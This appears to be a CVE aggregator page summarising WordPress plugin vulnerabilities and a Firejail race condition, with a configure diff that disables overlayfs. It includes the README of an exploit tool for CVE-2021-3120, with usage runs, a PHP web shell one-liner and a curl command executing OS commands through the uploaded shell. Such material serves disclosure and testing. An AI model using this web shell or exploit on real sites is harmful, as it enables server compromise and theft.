By default, the WP Page Builder WordPress plugin before 1.2.4 allows subscriber-level users to edit and make changes to any and all posts pages - user roles must be specifically blocked from editing posts and pages.

CVE-2021-24207

In the Ninja Forms Contact Form WordPress plugin before 3.4.34.1, low-level users, such as subscribers, were able to trigger the action, wp_ajax_nf_oauth, and retrieve the connection url needed to establish a connection. They could also retrieve the client_id for an already established OAuth connection.

CVE-2021-24164

The AJAX action, wp_ajax_ninja_forms_sendwp_remote_install_handler, did not have a capability check on it, nor did it have any nonce protection, therefore making it possible for low-level users, such as subscribers, to install and activate the SendWP Ninja Forms Contact Form â€“ The Drag and Drop Form Builder for WordPress WordPress plugin before 3.4.34 and retrieve the client_secret key needed to establish the SendWP connection while also installing the SendWP plugin.

CVE-2021-24163

Several AJAX endpoints in the Tutor LMS – eLearning and online course solution WordPress plugin before 1.7.7 were unprotected, allowing students to modify course information and elevate their privileges among many other actions.

CVE-2021-24184

Unvaludated input in the 301 Redirects - Easy Redirect Manager WordPress plugin, versions before 2.51, did not sanitise its "Redirect From" column when importing a CSV file, allowing high privilege users to perform SQL injections.

CVE-2021-24142

Unvalidated input in the Contact Form Submissions WordPress plugin before 1.7.1, could lead to SQL injection in the wpcf7_contact_form GET parameter when submitting a filter request as a high privilege user (admin+)

CVE-2021-24125

Lack of authorisation checks in the Modern Events Calendar Lite WordPress plugin, versions before 5.16.5, did not properly restrict access to the export files, allowing unauthenticated users to exports all events data in CSV or XML format for example.

CVE-2021-24146

An arbitrary file upload vulnerability in the YITH WooCommerce Gift Cards Premium plugin before 3.3.1 for WordPress allows remote attackers to achieve remote code execution on the operating system in the security context of the web server. In order to exploit this vulnerability, an attacker must be able to place a valid Gift Card product into the shopping cart. An uploaded file is placed at a predetermined path on the web server with a user-specified filename and extension. This occurs because the ywgc-upload-picture parameter can have a .php value even though the intention was to only allow uploads of Gift Card images.

**yith-giftdrop**

A tool for checking as well as exploiting CVE-2021-3120, Arbitrary File Upload vulnerability in YITH WooCommerce Gift Cards Premium version 3.3.0 and below.

**A Word of Warning**

Please do not run this tool against systems that you do not have permissions to test. Doing so is illegal and you could face prosecution despite your best intentions. If you are an IT/cyber security enthusiast and you are curious about how this tool works, I recommend that you setup your own lab environment for testing this tool out.

**Vulnerability Description**

A critical vulnerability (CVSSv3 9.8) exists in the WordPress plugin "YITH WooCommerce Gift Cards Premium" version 3.3.0 and below, which allows an attacker to upload arbitary files to the server and therefore achieve remote code execution on the server operating system in the security context of the web server.

The plugin allows gift card products to be added to the site (powered by the WordPress WooCommerce plugin) and offers an optional feature that let customers purchase gift cards with custom designs by upload a picture of their choice when placing the gift card product in the cart. The file is submitted via the "ywgc-upload-picture" file parameter of the POST request however the server does not perform any sanity checks before processing the request, and stores the file in a predictable location on the server, with the client-specified file name as well as file extension. Code execution can be easily achieved by uploading a PHP file with .php extension and then requesting the file at the uploaded location.

It is also worth noting that the vulnerability is exploitable regardless of whether the custom gift card design feature is enabled or not. The only condition required to exploit this vulnerability is the ability to add a gift card to the shopping cart.

**Vulnerability Details**

Vulnerability Name

Arbitrary File Upload Leading to Remote Code Execution

CVE

CVE-2021-3120

CVSS Vector

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CVSS Score

9.8 (Critical)

Vendor

YITH

Product Affected

YITH WooCommerce Gift Cards Premium

Product Page

https://yithemes.com/themes/plugins/yith-woocommerce-gift-cards/

Versions Affected

Version 3.3.0 and below

Fixed Version

v3.3.1

Version 3.1.5 and version 3.3.0 were used for testing and were found to be vulnerable. Lab environment was running WordPress 5.6 and WooCommerce 4.8.0.

**About This Tool**

This tool is written to automate the discovery of WordPress sites that may be affected by this issue. It does so by performing a version enumeration using information contained in the readme.txt file which is included with the plugin by default.

In addition, it has a capability to perform a proof of concept test by uploading a simple php script with a randomly generated name. The script contains a simple echo command, which when requested is used to confirm code execution. As the uploaded file will remain on the server, the randomly generated file name will help reduce the chance of the file being requested by others and also the script would not cause any harm to the server.

The tool can also be used to exploit this vulnerability. The default attack is to upload a simple PHP web shell. This can be used to execute further OS commands, including reverse shells. For more "interesting" scenarios you can specify a custom payload as well as custom file names to bypass further server-side restrictions.

**Installation**

Simply clone the repository or download the yith-giftdrop.py file to run.

**Usage**

To perform vulnerability test via version enumeration, specify the url of the gift card product (-u) and enumeration mode (-e). This is purely information gathering and does not attempt any file upload operations.

    $ ./yith-giftdrop.py -u http://192.168.0.1:8000/product/gift-card/ -e
    Info: Found plugin via readme.txt
    Info: Found version 3.1.5 - VULNERABLE! Please upgrade to v3.3.1 or above.
    

To perform a proof of concept, use the -c option. This will leave a PHP file on the server so a warning will be displayed to inform you of this and the program will exit at this point. You will need to add the -a or --accept flag to confirm that you understood this and want to continue.

    $ ./yith-giftdrop.py -u http://192.168.0.1:8000/product/gift-card/ -c -a
    Info: Found plugin via readme.txt
    Info: Found version 3.1.5 - VULNERABLE! Please upgrade to v3.3.1 or above.
    Info: Preparing for upload...
    Info: Uploaded file to: http://192.168.0.1:8000/wp-content/uploads/yith-gift-cards/2021/1/7eb0273842554d6e9db937be07faf270.php
    Info: Received expected response at payload url. CODE EXECUTION confirmed!
    

By default the tool will attempt to upload a basic web shell. Again you will need to add the -a or accept flag to confirm you want to proceed.

    $ ./yith-giftdrop.py -u http://192.168.0.1:8000/product/gift-card/ -a
    Info: Found plugin via readme.txt
    Info: Found version 3.1.5 - VULNERABLE! Please upgrade to v3.3.1 or above.
    Info: Preparing for upload...
    Info: Payload uploaded to: http://192.168.0.1:8000/wp-content/uploads/yith-gift-cards/2021/1/1ec442e859f44733b3e5271116e682ae.php
    Info: Default payload (OS Command Execution) is used. Try below to obtain server hostname:
    Info:     curl http://192.168.0.1:8000/wp-content/uploads/yith-gift-cards/2021/1/1ec442e859f44733b3e5271116e682ae.php?cmd=hostname
    $ curl http://192.168.0.1:8000/wp-content/uploads/yith-gift-cards/2021/1/1ec442e859f44733b3e5271116e682ae.php?cmd=id
    uid=33(www-data) gid=33(www-data) groups=33(www-data)
    

For other uses of the tool, including the use of a custom payload and file name, see the help screen.

    $ ./yith-giftdrop.py -h
    usage: yith-giftdrop.py [-h] [-e] [-c] -u URL [-p PAYLOAD] [-f FILE] [-n NAME] [-a]
    
    
    __   _______ _____ _   _   _____ _  __ _    ______
    \ \ / /_   _|_   _| | | | |  __ (_)/ _| |   |  _  \
     \ V /  | |   | | | |_| | | |  \/_| |_| |_  | | | |_ __ ___  _ __
      \ /   | |   | | |  _  | | | __| |  _| __| | | | | '__/ _ \| '_ \
      | |  _| |_  | | | | | | | |_\ \ | | | |_  | |/ /| | | (_) | |_) |
      \_/  \___/  \_/ \_| |_/  \____/_|_|  \__| |___/ |_|  \___/| .__/
                                                                | |
                                                                |_|
        A tool to check & exploit the arbitary file upload vulnerability
        in YITH WooCommerce Gift Cards Premium v3.3.0 and below
    
        CVE:        CVE-2021-3120
        Written by: Guy Liu
                    guy.liu@air-sec.co.uk
    
    optional arguments:
      -h, --help            show this help message and exit
      -e, --enum            Enum plugin version only
      -c, --check           Check for file upload and code execution only
      -u URL, --url URL     URL of Gift Card Product
      -p PAYLOAD, --payload PAYLOAD
                            Specify a payload to upload to server. Default is <?php echo shell_exec($_GET['cmd']);?>
      -f FILE, --file FILE  Specify a custom file to upload. Cannot be used with --payload/-p option
      -n NAME, --name NAME  Use specified file name rather than automatically generated file name
      -a, --accept          I understand that this program will leave payload files on the server
    
    

Enjoy!

CVE-2021-3120: GitHub - guy-liu/yith-giftdrop: Exploit for the Arbitrary File Upload vulnerability in YITH WooCommerce Gift Cards Premium

Firejail before 0.9.64.4 allows attackers to bypass intended access restrictions because there is a TOCTOU race condition between a stat operation and an OverlayFS mount operation.

@@ -1,6 +1,6 @@ #! /bin/sh # Guess values for system-dependent variables and create Makefiles. # Generated by GNU Autoconf 2.69 for firejail 0.9.64.2. # Generated by GNU Autoconf 2.69 for firejail 0.9.64.4. # # Report bugs to <netblue30@protonmail.com>. # @@ -580,8 +580,8 @@ MAKEFLAGS= # Identity of this package. PACKAGE\_NAME='firejail' PACKAGE\_TARNAME='firejail' PACKAGE\_VERSION='0.9.64.2' PACKAGE\_STRING='firejail 0.9.64.2' PACKAGE\_VERSION='0.9.64.4' PACKAGE\_STRING='firejail 0.9.64.4' PACKAGE\_BUGREPORT='netblue30@protonmail.com' PACKAGE\_URL='https://firejail.wordpress.com'  
@@ -711,7 +711,6 @@ enable\_option\_checking enable\_analyzer enable\_apparmor enable\_dbusproxy enable\_overlayfs enable\_usertmpfs enable\_man enable\_firetunnel @@ -1294,7 +1293,7 @@ if test "$ac\_init\_help" = "long"; then # Omit some internal or obsolete options to make the list less imposing. # This message is too long to be a string in the A/UX 3.1 sh. cat <<\_ACEOF \\\`configure' configures firejail 0.9.64.2 to adapt to many kinds of systems. \\\`configure' configures firejail 0.9.64.4 to adapt to many kinds of systems. Usage: $0 \[OPTION\]... \[VAR=VALUE\]... @@ -1356,7 +1355,7 @@ fi  
if test -n "$ac\_init\_help"; then case $ac\_init\_help in short | recursive ) echo "Configuration of firejail 0.9.64.2:";; short | recursive ) echo "Configuration of firejail 0.9.64.4:";; esac cat <<\\\_ACEOF @@ -1367,7 +1366,6 @@ Optional Features: \--enable-analyzer enable GCC 10 static analyzer \--enable-apparmor enable apparmor \--disable-dbusproxy disable dbus proxy \--disable-overlayfs disable overlayfs \--disable-usertmpfs disable tmpfs as regular user \--disable-man disable man pages \--disable-firetunnel disable firetunnel @@ -1473,7 +1471,7 @@ fi test -n "$ac\_init\_help" && exit $ac\_status if $ac\_init\_version; then cat <<\\\_ACEOF firejail configure 0.9.64.2 firejail configure 0.9.64.4 generated by GNU Autoconf 2.69 Copyright (C) 2012 Free Software Foundation, Inc. @@ -1775,7 +1773,7 @@ cat >config.log <<\_ACEOF This file contains any messages produced by compilers while running configure, to aid debugging if configure makes a mistake. It was created by firejail $as\_me 0.9.64.2, which was It was created by firejail $as\_me 0.9.64.4, which was generated by GNU Autoconf 2.69. Invocation command line was $ $0 $@ @@ -3530,18 +3528,16 @@ if test "x$enable\_dbusproxy" != "xno"; then :  
fi  
# overlayfs features temporarely disabled pending fixes HAVE\_OVERLAYFS="" # Check whether --enable-overlayfs was given. if test "${enable\_overlayfs+set}" = set; then : enableval=$enable\_overlayfs; fi  
if test "x$enable\_overlayfs" !\= "xno"; then :  
HAVE\_OVERLAYFS="\-DHAVE\_OVERLAYFS"  
  
fi # #AC\_ARG\_ENABLE(\[overlayfs\], # AS\_HELP\_STRING(\[--disable-overlayfs\], \[disable overlayfs\])) #AS\_IF(\[test "x$enable\_overlayfs" != "xno"\], \[ # HAVE\_OVERLAYFS="-DHAVE\_OVERLAYFS" # AC\_SUBST(HAVE\_OVERLAYFS) #\])  
HAVE\_USERTMPS="" # Check whether --enable-usertmpfs was given. @@ -4817,7 +4813,7 @@ cat >>$CONFIG\_STATUS <<\\\_ACEOF || ac\_write\_fail=1 \# report actual input values of CONFIG\_FILES etc. instead of their \# values after options handling. ac\_log=" This file was extended by firejail $as\_me 0.9.64.2, which was This file was extended by firejail $as\_me 0.9.64.4, which was generated by GNU Autoconf 2.69. Invocation command line was CONFIG\_FILES = $CONFIG\_FILES @@ -4871,7 +4867,7 @@ \_ACEOF cat >>$CONFIG\_STATUS <<\_ACEOF || ac\_write\_fail=1 ac\_cs\_config="\`$as\_echo "$ac\_configure\_args" | sed 's/^ //; s/\[\\\\""\\\`\\$\]/\\\\\\\\&/g'\`" ac\_cs\_version="\\\\ firejail config.status 0.9.64.2 firejail config.status 0.9.64.4 configured by $0, generated by GNU Autoconf 2.69, with options \\\\"\\$ac\_cs\_config\\\\"

CVE-2021-26910: disabled overlayfs, 0.9.64.4 testing · netblue30/firejail@97d8a03

The Elementor Contact Form DB plugin before 1.6 for WordPress allows CSRF via backend admin pages.

Tag

#wordpress